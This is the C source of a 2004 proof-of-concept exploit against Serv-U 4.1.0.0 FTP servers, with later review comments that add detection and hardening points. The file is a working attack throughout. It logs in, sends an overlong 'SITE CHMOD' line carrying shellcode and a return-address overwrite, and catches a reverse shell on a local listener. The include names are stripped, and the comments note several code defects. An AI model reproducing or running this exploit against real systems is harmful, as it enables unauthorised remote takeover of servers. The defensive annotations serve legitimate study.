/*
 * date: 25 janv 2004
 * software: Serv-U 4.1.0.0 (prolly others)
 * vendor: RhinoSoft, http://www.serv-u.com/
 * credits: kkqq , http://www.0x557.org/release/servu.txt
 * greets: rosecurity team, int3liban
 * notes: should work on any NT, reverse bindshell, terminates the process
 *        properly handle directories
 * author: mandragore, sploiting@mandragore.solidshells.com
 *
 * cheap changelog:
 * 27 jan 2004 improved banners handling (select()'s), added listener,
 *             default ip gathering (needs ifconfig & gawk)
 */

/*
 * NOTE(review): public 2004 proof-of-concept against Serv-U 4.1.0.0 (long
 * end-of-life). What the code below visibly does: it logs in over FTP with
 * a supplied account, changes into a writable directory, sends a single
 * 602-byte "SITE CHMOD 777 " line that is mostly 0x90 padding with an
 * embedded payload and a 4-byte address overwrite, and expects the server
 * process to connect back to a listener this program opens (default port
 * 8888). Defensive takeaways that follow directly from that: an FTP login
 * followed by a ~600-byte SITE CHMOD argument consisting largely of 0x90
 * bytes is a trivially detectable log/IDS pattern; an outbound TCP
 * connection initiated by the FTP server process is the post-exploitation
 * indicator, so egress filtering on the server host limits impact; and the
 * precondition is a writable directory reachable by the account used, so
 * restricting anonymous/guest write access narrows exposure.
 */

/*
 * NOTE(review): the header names that followed each "#include" below were
 * stripped when this listing was extracted (the angle-bracketed text was
 * lost as markup). Eleven includes are present; the names have to be
 * restored from the original before this compiles.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Print the last error for x and exit. Note fatal() is also used for the
 * success path at the end of main(), so "[+] done" is printed through
 * perror() with whatever errno happens to hold. */
#define fatal(x) { perror(x); exit(1); }

/* Payload bytes sent to the server. 204 bytes; the listener IP and port are
 * patched in at offsets 0x53 and 0x5a by main() after XOR-masking with 0x96
 * (see the memcpy calls there). The array has no NUL terminator, so the
 * strlen(sc) calls in main() read past its end until the next zero byte in
 * memory rather than using the array size. */
unsigned char sc[]={ // reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

/* Globals shared between the FTP session code, reads() and the listener.
 * user/pass/path are overridden from argv; they are later formatted into
 * the 4096-byte buff with unbounded sprintf(). */
char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";
int s, ret;          /* current socket and last return value */
char *buff;          /* 4096-byte I/O buffer, malloc'd in callback()/main() */
int verbose=0;
struct sockaddr_in saddr;
int lhost, lport=8888;   /* listener address/port, as raw in_addr int and host-order port */

/* Print command-line help and exit(1). Never returns. */
void usage(char *argv0)
{
    printf("usage: %s -d [options]\n",argv0);
    printf("options:\n");
    printf(" -d target ip\n");
    printf(" -p target port (default 21)\n");
    printf(" -u username to log with (default %s)\n",user);
    printf(" -s password to log with (default %s)\n",pass);
    printf(" -w writable directory (default %s)\n",path);
    printf(" -H listening host (default %s)\n", \
        inet_ntoa(*(struct in_addr *)&lhost));
    printf(" -P listening port on host (default %d)\n",lport);
    printf(" -v verbose (set to 1 to enable)\n");
    printf("\n");
    exit(1);
}

/* Drain whatever the server sends on s into buff, one recv() at a time,
 * until the socket stays quiet for one second. Each iteration overwrites
 * buff, so callers only ever see the last chunk received.
 *
 * Defects visible here: the recv() result is not checked, so on error (-1)
 * memset() writes one byte before the heap buffer, and on a closed peer
 * (0) select() keeps reporting the socket readable and the loop never ends.
 * "__next" is also a reserved identifier (double underscore). */
void reads()
{
    fd_set fds;
    struct timeval tv;
__next:
    ret=recv(s,buff,4095,0);
    memset(buff+ret,0,1);   /* NUL-terminate so buff can be printed/strstr'd */
    if (verbose) printf("%s",buff);
    FD_ZERO(&fds);
    FD_SET(s,&fds);
    tv.tv_sec = 1;
    tv.tv_usec = 0;
    if (select(s+1, &fds, NULL, NULL, &tv)!=0) goto __next;
}

/* Guess a default listener address by shelling out to ifconfig/grep/gawk
 * and parsing the first "Bcast" line. Returns the inet_addr() of the text
 * read, so a failed command yields whatever inet_addr("") returns.
 *
 * popen() and fgets() results are not checked (a NULL FILE* is passed
 * straight to fgets/pclose), and the local buff shadows the global one. */
int getip()
{
    char buff[17]="";
    FILE *f;
    f=popen("echo -n `/sbin/ifconfig|grep Bcast|" \
        "gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`","r");
    fgets(buff,16,f);
    pclose(f);
    return inet_addr(buff);
}

/* Child-process side: bind a TCP listener on 0.0.0.0:port (all interfaces,
 * since s_addr is 0), accept one connection and relay bytes between the
 * terminal and that connection until an error. Does not return.
 *
 * socket(2,1,6) spells AF_INET/SOCK_STREAM/IPPROTO_TCP with magic numbers.
 * accept() and read() results are unchecked (a -1 from accept goes into
 * FD_SET; a -1 from read becomes a huge size_t for send). The loop selects
 * on fd 0 but then reads from fd 1, which only works while both refer to
 * the same terminal. s_len should be socklen_t. */
void callback(int port)
{
    fd_set fds;
    int s_len=sizeof(saddr);
    int sn;
    buff=(char *)malloc(4096);
    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = 0;
    saddr.sin_port = htons(port);
    printf("[.] setting up listener on port %d..\n",port);
    s=socket(2,1,6);
    ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
    if (ret==-1) { // we don't want to crash servu if not needed
        /* Tell the parent (via SIGUSR1) to abort before it sends anything. */
        perror("[-] shell.bind");
        kill(getppid(),SIGUSR1);
        exit(1);
    }
    listen(s,1);
    sn=accept(s,(struct sockaddr *)&saddr,&s_len);
    printf("[+] got connection from %s, entering shell..\n", \
        inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));
    while(1) {
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sn,&fds);
        if (select(sn+1, &fds, NULL, NULL, NULL) < 0) fatal("[-] shell.select ");
        if (FD_ISSET(0,&fds)) {
            ret = read(1,buff,4096);   /* reads fd 1, not the fd 0 that was selected */
            send(sn,buff,ret,0);
        }
        if (FD_ISSET(sn,&fds)) {
            if ( (ret=recv(sn,buff,4096,0)) < 1 ) fatal("[-] shell.recv");
            write(1,buff,ret);
        }
    }
}

/* SIGUSR1 handler installed in the child: parent gave up, so exit.
 * printf()/exit() are not async-signal-safe; works in practice here only
 * because the process is about to terminate anyway. */
void killchild()
{
    printf("[-] got signal from parent, exiting.\n");
    exit(1);
}

/* SIGUSR1 handler installed in the parent: child's bind() failed, so exit.
 * Same async-signal-safety caveat as killchild(). */
void killmain()
{
    printf("[-] got signal from child, exiting.\n");
    exit(1);
}

/* Entry point: parse options, fork the listener child, patch the listener
 * address into sc, run the FTP login/CWD dialogue, then send the single
 * oversized SITE CHMOD line and report based on whether the server still
 * answers. Returns via exit(). */
int main(int argc, char **argv)
{
    short port=21;               /* atoi() result truncated to short */
    int target=0;
    int i, pid;
    int delta=423;               /* offset of the 4-byte overwrite within the line, minus the PWD-derived path length */
    int callebx=0x10077A92; // libeay32.dll
    char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
    char chmod[]="SITE CHMOD 777 ";
    printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");
    lhost=getip();
    if (argc<2) usage(argv[0]);
    while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
        switch (i) {
            case 'd': target=inet_addr(optarg); break;
            case 'p': port=atoi(optarg); break;
            case 'u': user=optarg; break;
            case 's': pass=optarg; break;
            case 'w': path=optarg; break;
            case 'H': lhost=inet_addr(optarg); break;
            case 'P': lport=atoi(optarg); break;
            case 'v': verbose=atoi(optarg); break;
            default: usage(argv[0]); break;
        }
    }
    /* -1 is inet_addr()'s INADDR_NONE; a target of 0 (option omitted) is not rejected. */
    if ((target==-1) || (lhost==-1) || (lhost==0)) usage(argv[0]);
    printf("[.] if working you'll have a shell on %s:%d.\n", \
        inet_ntoa(*(struct in_addr *)&lhost),lport);
    printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
        user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
    /* fork() failure (-1) is not handled: the parent path runs with pid == -1
     * and a later kill(pid, SIGUSR1) would signal every process it may. */
    pid=fork();
    switch(pid) {
        case 0:
            signal(SIGUSR1,killchild);
            callback(lport);   /* does not return */
            break;
        default:
            signal(SIGUSR1,killmain);
            break;
    }
    /* Patch listener port (XOR 0x9696, byte-swapped) and address (XOR
     * 0x96969696) into the payload at the offsets noted on sc[]. */
    lport=lport ^ 0x9696;
    lport=(lport & 0xff) << 8 | lport >>8;
    memcpy(sc+0x5a,&lport,2);
    lhost=lhost ^ 0x96969696;
    memcpy(sc+0x53,&lhost,4);
    buff=(char *)malloc(4096);
    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = target;
    saddr.sin_port = htons(port);
    s=socket(2,1,6);
    ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
    if (ret==-1) {
        kill(pid,SIGUSR1);
        sleep(1);
        fatal("[-] connect()");
    }
    reads();   /* banner */
    /* USER/PASS/CWD are built with unbounded sprintf() from argv values
     * into the 4096-byte buff; an overlong -u/-s/-w overflows it. */
    sprintf(buff,"USER %s\r\n",user);
    if (verbose) printf("%s",buff);
    send(s,buff,strlen(buff),0);
    reads();
    sprintf(buff,"PASS %s\r\n",pass);
    if (verbose) printf("%s",buff);
    send(s,buff,strlen(buff),0);
    reads();
    /* Login success is detected by "230" appearing anywhere in the last
     * chunk reads() kept, not by parsing the reply code. */
    if (strstr(buff,"230")==0) {
        printf("[-] can't login\n");
        exit(1);
    } else printf("[+] logged in.\n");
    sprintf(buff,"CWD %s\r\n",path);
    if (verbose) printf("%s",buff);
    send(s,buff,strlen(buff),0);
    reads();
    // verify directory
    sprintf(buff,"PWD\r\n",path);   /* extra argument is ignored by the format */
    send(s,buff,strlen(buff),0);
    ret=recv(s,buff,1024,0);        /* unchecked: -1 here makes the memset write before buff */
    memset(buff+ret,0,1);
    /* Length of the quoted path in the 257 reply; if no closing quote is
     * found strstr() returns NULL and i becomes a meaningless offset. */
    i=strstr(buff+5,"\x22")-buff-5;
    if (i!=1) i++; // trailing /
    printf("[+] sending exploit..\n");
    /* Build the 602-byte line: 600 bytes of 0x90 + CRLF, with the command
     * prefix at the front, sc, the jump stub and the 4-byte address laid
     * in at fixed distances below delta. strlen(sc) over-reads sc (no NUL
     * inside the array); see the note on sc[]. */
    bzero(buff,4096);
    memset(buff,0x90,600);
    strcat(buff,"\r\n");
    delta-=i; // strlen(path);
    memcpy(buff,&chmod,strlen(chmod));
    memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
    memcpy(buff+delta-9,&jmpback,5+4);
    memcpy(buff+delta,&callebx,4);
    send(s,buff,602,0);
    /* No reply (closed socket or error) is taken as success; any reply
     * is taken as "not vulnerable". */
    ret=recv(s,buff,1024,0);
    if ((ret==0) || (ret==-1)) {
        kill(pid,SIGUSR1);
        sleep(1);
        sleep(1);
        fatal("[+] done");
    }
    printf("[-] remote servu isn't vulnerable.\n");
    memset(buff+ret,0,1);
    printf("%s",buff);
    close(s);
    exit(0);
}